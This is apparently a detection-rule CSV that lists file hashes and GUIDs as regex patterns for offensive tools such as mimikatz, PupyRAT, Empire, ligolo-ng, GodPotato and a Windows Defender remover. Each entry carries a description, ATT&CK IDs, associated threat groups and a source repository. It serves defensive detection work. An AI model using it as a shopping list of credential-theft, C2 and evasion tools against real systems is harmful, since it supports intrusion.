"*6b6aede14ee7f52374cf3fbc5d790afa32f23dc0791514ce26306514e4a22ee4*",".{0,1000}6b6aede14ee7f52374cf3fbc5d790afa32f23dc0791514ce26306514e4a22ee4.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","#filehash","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","28418"
"*6b7819ab7d2400b9da53cc075e67d32d06a29c647afd19ba21c2197ee11f5182*",".{0,1000}6b7819ab7d2400b9da53cc075e67d32d06a29c647afd19ba21c2197ee11f5182.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","28419"
"*6b816c41bab51043022a96f74980439be30aa8af02a1aac0ee56912a710115af*",".{0,1000}6b816c41bab51043022a96f74980439be30aa8af02a1aac0ee56912a710115af.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1134.001 - T1068  - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","0","#filehash","N/A","10","10","1938","236","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z","28420"
"*6b840eb34526b58124cca1fee8c3999e008c49afd9cfc896e820f294231232cf*",".{0,1000}6b840eb34526b58124cca1fee8c3999e008c49afd9cfc896e820f294231232cf.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","28421"
"*6b8453724d41251986a3dc94f0e725d07a4c1b9171228e89ee8ef0daef3b0b2c*",".{0,1000}6b8453724d41251986a3dc94f0e725d07a4c1b9171228e89ee8ef0daef3b0b2c.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","28422"
"*6b8453724d41251986a3dc94f0e725d07a4c1b9171228e89ee8ef0daef3b0b2c*",".{0,1000}6b8453724d41251986a3dc94f0e725d07a4c1b9171228e89ee8ef0daef3b0b2c.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","28423"
"*6b9093336ef9693a155bf5b514705424177b9d48679ddb809d18a75501c1041f*",".{0,1000}6b9093336ef9693a155bf5b514705424177b9d48679ddb809d18a75501c1041f.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","#filehash","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","28424"
"*6b93d86d6d72b894fbcc5f895ccfd701605fe1047398d17c3c6ba1159ad6ee4c*",".{0,1000}6b93d86d6d72b894fbcc5f895ccfd701605fe1047398d17c3c6ba1159ad6ee4c.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","28425"
"*6b945fec14f309058ac5db5ff19254b5aa3facfc9c68b44b4c926cb9336529a2*",".{0,1000}6b945fec14f309058ac5db5ff19254b5aa3facfc9c68b44b4c926cb9336529a2.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","28426"
"*6b95cd81ca4f309ac9f243ae73d2e8099634aaffead5b7b214bfcd14b6d604f6*",".{0,1000}6b95cd81ca4f309ac9f243ae73d2e8099634aaffead5b7b214bfcd14b6d604f6.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","#filehash","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","28427"
"*6b9c155d3ce702c042f0ce00d42909fd7fb0a3f37e2f477dbdb40b0881d4e2d5*",".{0,1000}6b9c155d3ce702c042f0ce00d42909fd7fb0a3f37e2f477dbdb40b0881d4e2d5.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","28429"
"*6ba3ca97783fab63b22995124ef0472633762b2364f1d2a1a0bafb2983777ad9*",".{0,1000}6ba3ca97783fab63b22995124ef0472633762b2364f1d2a1a0bafb2983777ad9.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","28430"
"*6baa01602cddc4d7a7d85626ab56c3a5e5f4abafef152af6304e2caa62d7ff9b*",".{0,1000}6baa01602cddc4d7a7d85626ab56c3a5e5f4abafef152af6304e2caa62d7ff9b.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","28432"
"*6babb664a4c688234f19f258d7a4de2ffd2b8eb51a9ae6c35ea0bee20d214453*",".{0,1000}6babb664a4c688234f19f258d7a4de2ffd2b8eb51a9ae6c35ea0bee20d214453.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","0","#filehash","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","28433"
"*6bbcf0ee5f4adf9d64d66bc8457ac414830c869ad8a688c86099b41b0328a0b7*",".{0,1000}6bbcf0ee5f4adf9d64d66bc8457ac414830c869ad8a688c86099b41b0328a0b7.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","28435"
"*6bd11a9b68e81660518ccc9888cf6ea1f2d85c5bb33857f543298c2386e07bdf*",".{0,1000}6bd11a9b68e81660518ccc9888cf6ea1f2d85c5bb33857f543298c2386e07bdf.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","28436"
"*6be513459b23f6fe5bbf0f7654882a2a5a2cb1d19e873e6501fe9768f26c2119*",".{0,1000}6be513459b23f6fe5bbf0f7654882a2a5a2cb1d19e873e6501fe9768f26c2119.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28437"
"*6be97bfbc4bdb40ea061c20d75d0c812de61b262c96f891a438fdd280aad4c6f*",".{0,1000}6be97bfbc4bdb40ea061c20d75d0c812de61b262c96f891a438fdd280aad4c6f.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","28439"
"*6bf16a634af95469401406492913ac1b8e1cc2b9e0e2008be1cf71e81a1e87be*",".{0,1000}6bf16a634af95469401406492913ac1b8e1cc2b9e0e2008be1cf71e81a1e87be.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","28442"
"*6BF82CF9845C649557FC02D1E3D0B6A9FB4F827CC7815BF477DD0CB51246DA45*",".{0,1000}6BF82CF9845C649557FC02D1E3D0B6A9FB4F827CC7815BF477DD0CB51246DA45.{0,1000}","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/canix1/ADACLScanner","1","0","#filehash","AD Enumeration","7","10","1015","173","2025-04-11T14:35:08Z","2017-04-06T12:28:37Z","28444"
"*6bfc3e0664e6aab7d6925ad1c191c75bc1f1f5b4dd4f8c073c5eef063ec92de7*",".{0,1000}6bfc3e0664e6aab7d6925ad1c191c75bc1f1f5b4dd4f8c073c5eef063ec92de7.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","28445"
"*6c07205f852af6214909bb887cc94df51f6dd4fee6d9b83c292d70a0970b0bc0*",".{0,1000}6c07205f852af6214909bb887cc94df51f6dd4fee6d9b83c292d70a0970b0bc0.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","28447"
"*6c07e0eb6cf4e7ed13bc4573817151451342c822ea9d52becb1865e2a761cb57*",".{0,1000}6c07e0eb6cf4e7ed13bc4573817151451342c822ea9d52becb1865e2a761cb57.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","28448"
"*6C0942A1-C852-40F4-95F9-953510BD102D*",".{0,1000}6C0942A1\-C852\-40F4\-95F9\-953510BD102D.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#GUIDproject","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","28449"
"*6c0aaa05f8c75791a7bd4e950183d25276d70476a4ba243801dd47e5329a185d*",".{0,1000}6c0aaa05f8c75791a7bd4e950183d25276d70476a4ba243801dd47e5329a185d.{0,1000}","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems","T1071.002 - T1105 - T1090.001","TA0011","N/A","N/A","C2","https://github.com/PhrozenIO/SharpFtpC2","1","0","#filehash","N/A","10","10","88","15","2023-11-09T10:37:20Z","2023-06-09T12:41:28Z","28450"
"*6c0ab655196a8fa5f9829ae8533eed10080676eb37f8603ffe159e82e64836ea*",".{0,1000}6c0ab655196a8fa5f9829ae8533eed10080676eb37f8603ffe159e82e64836ea.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28451"
"*6c0eeb395a6d674e89bc6113467923e8b23a4ed4ade5dd5e5f0c260bd8493efa*",".{0,1000}6c0eeb395a6d674e89bc6113467923e8b23a4ed4ade5dd5e5f0c260bd8493efa.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28452"
"*6c0f535128c8536421e213c4c1f55e4eaf690aaca78e34dc106994df1b48cf4b*",".{0,1000}6c0f535128c8536421e213c4c1f55e4eaf690aaca78e34dc106994df1b48cf4b.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","28453"
"*6c152888df8ae98171b78aeea0a6d9935b371eaded61a067b82c1cec8edc0844*",".{0,1000}6c152888df8ae98171b78aeea0a6d9935b371eaded61a067b82c1cec8edc0844.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","28454"
"*6c174114cc8159ea4a8614b5418fa6e6405c42c64675657f69b1ae1839dd0a70*",".{0,1000}6c174114cc8159ea4a8614b5418fa6e6405c42c64675657f69b1ae1839dd0a70.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","28455"
"*6c1ae2e334c3636ebebb7067a21ecd2432d882d49b3f8f740b4e94e8aa64dc8c*",".{0,1000}6c1ae2e334c3636ebebb7067a21ecd2432d882d49b3f8f740b4e94e8aa64dc8c.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","28456"
"*6c1b2c4d2b69d38a438af8d9f8c8aa411111d35b03b988f7a3dc4b9aec0605c6*",".{0,1000}6c1b2c4d2b69d38a438af8d9f8c8aa411111d35b03b988f7a3dc4b9aec0605c6.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","28457"
"*6c2ceb31348ef2780f96483fc744807651cc3a72d1dceb808ca24bc36bc08bec*",".{0,1000}6c2ceb31348ef2780f96483fc744807651cc3a72d1dceb808ca24bc36bc08bec.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","28461"
"*6c3c38f6c80a0c6cc5c2527990decec2c5ba98c368abf75ae9fd44c4c3303443*",".{0,1000}6c3c38f6c80a0c6cc5c2527990decec2c5ba98c368abf75ae9fd44c4c3303443.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","28463"
"*6C3D086F568E4DCF1379D750C48464FC1F737326E2547DEE1EAFFD00F19FF16C*",".{0,1000}6C3D086F568E4DCF1379D750C48464FC1F737326E2547DEE1EAFFD00F19FF16C.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","#filehash","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","28464"
"*6c40e6c2415953b0716a499a3b8b5e5541a5c4a523971ff7c3076d892a3a25d3*",".{0,1000}6c40e6c2415953b0716a499a3b8b5e5541a5c4a523971ff7c3076d892a3a25d3.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","28468"
"*6c43f8eb224f04c2d5c0dc415e16db9151ab0739c7dc12530be41ff61682ffbe*",".{0,1000}6c43f8eb224f04c2d5c0dc415e16db9151ab0739c7dc12530be41ff61682ffbe.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","28469"
"*6c44d6bfc218285f9f359e67c18bb652b16602dbcd524128a2a8996823a683ee*",".{0,1000}6c44d6bfc218285f9f359e67c18bb652b16602dbcd524128a2a8996823a683ee.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","28470"
"*6c4696003fe73566fe0a2c42a4bbd3171f576fb8b0175fbcc13381109fd632b2*",".{0,1000}6c4696003fe73566fe0a2c42a4bbd3171f576fb8b0175fbcc13381109fd632b2.{0,1000}","offensive_tool_keyword","PrivFu","SeTcbPrivilege exploitation","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","#filehash","PrivFu\PowerOfTcb","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","28472"
"*6c4c9900e2d006a9b7dde59982905c5c6354eb8de5ceae88f1da96161756042d*",".{0,1000}6c4c9900e2d006a9b7dde59982905c5c6354eb8de5ceae88f1da96161756042d.{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","0","#filehash","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","28474"
"*6c4f7d10004fd5cbe197202612072cab361f1d39df0355b5a2f1d01437316128*",".{0,1000}6c4f7d10004fd5cbe197202612072cab361f1d39df0355b5a2f1d01437316128.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","28475"
"*6c615c17a6bd1fc0ce0f1add0b254e60fc162e44d94afc77ac91c2d3e9bb65be*",".{0,1000}6c615c17a6bd1fc0ce0f1add0b254e60fc162e44d94afc77ac91c2d3e9bb65be.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","28480"
"*6c66a39e447a7bfd2e7c2fab4a3f05ba7e97d1a1cd88a384ee6c703f652d81ed*",".{0,1000}6c66a39e447a7bfd2e7c2fab4a3f05ba7e97d1a1cd88a384ee6c703f652d81ed.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","28481"
